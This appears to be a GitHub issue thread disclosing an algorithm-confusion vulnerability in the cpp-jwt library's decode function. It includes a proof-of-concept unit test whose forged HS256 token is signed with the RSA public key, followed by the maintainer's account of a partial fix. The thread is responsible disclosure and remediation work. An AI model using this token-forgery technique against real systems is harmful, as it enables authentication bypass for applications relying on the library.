arun11299
[Vuln] Algorithm Confusion in jwt::decode
Hello! This library has security issues with algorithm confusion. If the developer allows both the HS algorithm and the RS algorithm, the attacker can use the RSA public key and encrypt the JWT using the HMAC algorithm to bypass the verification.
poc
TEST (RSAAlgo, HS256RSA256DecodingTest)
{
using namespace jwt::params;
const char* expected_sign =
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhbGwiLCJleHAiOjE1MTM4NjIzNzEsImlzcyI6ImFydW4ubXVyYWxpZGhhcmFuIn0.F-LR5k7OodsUlepUh_jUWyalRdMaOnRxVt2rFh5pxNs";
std::error_code ec;
//Decode
std::string key = read_from_file(RSA256_PUB_KEY);
ASSERT_TRUE (key.length());
auto dec_obj = jwt::decode(expected_sign, algorithms({"HS256", "RS256"}), ec, secret(key));
EXPECT_FALSE (ec);
}
Likewise, if the developer allows the None algorithm, then it makes no sense to allow other algorithms. For details, please refer to the following article: https://portswigger.net/web-security/jwt/algorithm-confusion How to fix: Refer to https://github.com/Thalhammer/jwt-cpp and limit each key to one algorithm. Thank you!
Thanks for the bug report @P3ngu1nW . It is very detailed. Are you able to provide a PR for this ? If you are, I can help you with the changes.
Any plan to fix this security issue? It will cause authentication bypass to application using this library if it's not fixed in time. @arun11299
@RealHurrison I have added a check for the time being to not allow any public key to be assigned as the secret for decoding. This checks kicks in for all algorithms except RS and elliptic cryptos.
I have not done the suggested checks for allowing only single algorithm in decode as it is a major change and also impacts existing user code as well and mostly because I am not having enough time to work with C++ code bases as I have not been using it since a long time now. But atleast, I believe the authentication bypass should be resolved with this fix.